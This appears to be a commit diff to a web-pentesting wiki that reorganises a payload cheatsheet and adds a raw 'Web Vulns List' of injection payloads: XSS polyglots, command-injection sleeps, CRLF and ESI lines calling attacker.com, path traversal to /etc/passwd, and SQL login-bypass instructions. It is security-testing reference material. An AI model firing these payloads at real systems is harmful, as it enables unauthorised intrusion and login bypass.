GitBook: [master] 8 pages modified

SUMMARY.md

@@ -337,7 +337,8 @@
 ## Pentesting Web
 
 * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
-* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet.md)
+* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
+  * [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)
 * [2FA/OTP Bypass](pentesting-web/2fa-bypass.md)
 * [Abusing hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
 * [Bypass Payment Process](pentesting-web/bypass-payment-process.md)

pentesting-web/login-bypass/sql-login-bypass.md

@@ -2,7 +2,7 @@
 
 This list contains **payloads to bypass the login via XPath, LDAP and SQL injection**\(in that order\).
 
-The way to use this list is to put the **first part it in the username and password.** Then, put all of it \(both parts\) it in the username or the password while putting some password \(like _Pass1234._\) or some known username \(like _admin_\).
+The way to use this list is to put the **first 200 lines as the username and password.** Then, put the complete list in the username first and then in the password inputs while putting some password \(like _Pass1234._\) or some known username \(like _admin_\).
 
 ```text
 admin
@@ -272,9 +272,6 @@ admin' and substring(password/text(),1,1)='7
 '=''-- 2
 '=''#
 '=''/*
-```
-
-```text
 0'<'2'-- 2
 0'<'2'#
 0'<'2'/*

pentesting-web/pocs-and-polygloths-cheatsheet/README.md

@@ -52,7 +52,7 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
 ```
 
-## [Client Side Template Injection](client-side-template-injection-csti.md)
+## [Client Side Template Injection](../client-side-template-injection-csti.md)
 
 ### Basic Tests
 
@@ -67,7 +67,7 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
 {{7*7}}[7*7]
 ```
 
-## [Command Injection](command-injection.md)
+## [Command Injection](../command-injection.md)
 
 ### Basic Tests
 
@@ -89,7 +89,7 @@ $(ls)
 /*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
 ```
 
-## [CRLF](crlf-0d-0a.md)
+## [CRLF](../crlf-0d-0a.md)
 
 ### Basic Tests
 
@@ -108,7 +108,7 @@ $(ls)
 <br><b><h1>THIS IS AND INJECTED TITLE </h1>
 ```
 
-## [File Inclusion/Path Traversal](file-inclusion/)
+## [File Inclusion/Path Traversal](../file-inclusion/)
 
 ### Basic Tests
 
@@ -125,7 +125,7 @@ http://asdasdasdasd.burpcollab.com/mal.php
 \\asdasdasdasd.burpcollab.com/mal.php
 ```
 
-## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
+## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery.md)
 
 ### Basic Tests
 
@@ -137,7 +137,7 @@ https://google.com
 javascript:alert(1)
 ```
 
-## [ReDoS](regular-expression-denial-of-service-redos.md)
+## [ReDoS](../regular-expression-denial-of-service-redos.md)
 
 ### Basic Tests
 
@@ -147,7 +147,7 @@ javascript:alert(1)
 ((a+)+)+$
 ```
 
-## [Server Side Inclusion/Edge Side Inclusion](server-side-inclusion-edge-side-inclusion-injection.md)
+## [Server Side Inclusion/Edge Side Inclusion](../server-side-inclusion-edge-side-inclusion-injection.md)
 
 ### Basic Tests
 
@@ -164,11 +164,11 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C
 <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
 ```
 
-## [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
+## [Server Side Request Forgery](../ssrf-server-side-request-forgery.md)
 
 The same tests used for Open Redirect can be used here.
 
-## [Server Side Template Injection](ssti-server-side-template-injection/)
+## [Server Side Template Injection](../ssti-server-side-template-injection/)
 
 ### Basic Tests
 
@@ -187,7 +187,7 @@ ${{7*7}}
 {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
 ```
 
-## [XSLT Server Side Injection](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
+## [XSLT Server Side Injection](../xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
 
 ### Basic Tests
 

pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md

@@ -0,0 +1,43 @@
+# Web Vulns List
+
+```python
+{{7*7}}[7*7]
+1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
+/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
+%0d%0aLocation:%20http://attacker.com
+%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
+%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
+%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
+<br><b><h1>THIS IS AND INJECTED TITLE </h1>
+/etc/passwd
+../../../../../../etc/hosts
+..\..\..\..\..\..\etc/hosts
+/etc/hostname
+../../../../../../etc/hosts
+C:/windows/system32/drivers/etc/hosts
+../../../../../../windows/system32/drivers/etc/hosts
+..\..\..\..\..\..\windows/system32/drivers/etc/hosts
+http://asdasdasdasd.burpcollab.com/mal.php
+\\asdasdasdasd.burpcollab.com/mal.php
+www.whitelisted.com
+www.whitelisted.com.evil.com
+https://google.com
+//google.com
+javascript:alert(1)
+(\\w*)+$
+([a-zA-Z]+)*$
+((a+)+)+$
+<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
+{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
+<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
+" onclick=alert() a="
+'"><img src=x onerror=alert(1) />
+javascript:alert()
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
+-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
+">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
+" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
+';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
+
+```
+

pentesting-web/web-vulnerabilities-methodology.md

@@ -44,7 +44,7 @@ If the introduced data may somehow being reflected in the response, the page mig
 
 Some of the mentioned vulnerabilities requires special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
 
-{% page-ref page="pocs-and-polygloths-cheatsheet.md" %}
+{% page-ref page="pocs-and-polygloths-cheatsheet/" %}
 
 ### **Search functionalities**
 

pentesting/pentesting-web/README.md

@@ -148,7 +148,7 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 
 > At this point you should already have some information of the web server being used by the client \(if any data is given\) and some tricks to keep in mind during the test. If you are lucky you have even found a CMS and run some scanner.
 
-## Step-by-step Web Application testing
+## Step-by-step Web Application Discovery
 
 > From this point we are going to start interacting with the web application.
 
@@ -161,9 +161,17 @@ joomlavs.rb #https://github.com/rastating/joomlavs
 * /crossdomain.xml
 * /clientaccesspolicy.xml
 * /.well-known/
-* Some _404_ error - _Some interesting data could be presented here._
 * Check also comments in the main and secondary pages.
 
+#### Forcing errors
+
+Web servers may **behave unexpectedly** when weird data is sent to them. This may open **vulnerabilities** or **disclosure sensitive information**.
+
+* Access **fake pages** like /whatever\_fake.php \(.aspx,.html,.etc\)
+* **Add "\[\]", "\]\]", and "\[\["** in **cookie values** and **parameter** values to create errors
+* Generate error by giving input as **`/~randomthing/%s`** at the **end** of **URL**
+* Try **different HTTP Verbs** like PATCH, DEBUG or wrong like FAKE
+
 #### Check if you can upload files \([PUT verb, WebDav](put-method-webdav.md)\)
 
 If you find that **WebDav** is **enabled** but you don't have enough permissions for **uploading files** in the root folder try to:
@@ -299,6 +307,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
   * {"user\_id":"<legit\_id>","user\_id":"<victims\_id>"} \(JSON Parameter Pollution\)
   * user\_id=ATTACKER\_ID&user\_id=VICTIM\_ID \(Parameter Pollution\)
 * Go to [https://archive.org/web/](https://archive.org/web/) and check if in the past that file was **worldwide accessible**.
+* Try to [**use other User Agents**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) to access the resource.
 * **Fuzz the page**: Try using HTTP Proxy **Headers**, HTTP Authentication Basic and NTLM brute-force \(with a few combinations only\) and other techniques. To do all of this I have created the tool [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass).
   * `X-Originating-IP: 127.0.0.1` 
   * `X-Forwarded-For: 127.0.0.1` 
@@ -339,7 +348,9 @@ You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
 
 It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** \(as the browser will execute the redirection\) but something could be **hidden** in there.
 
-## Web Vulnerabilities
+
+
+## Web Vulnerabilities Checking
 
 Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here: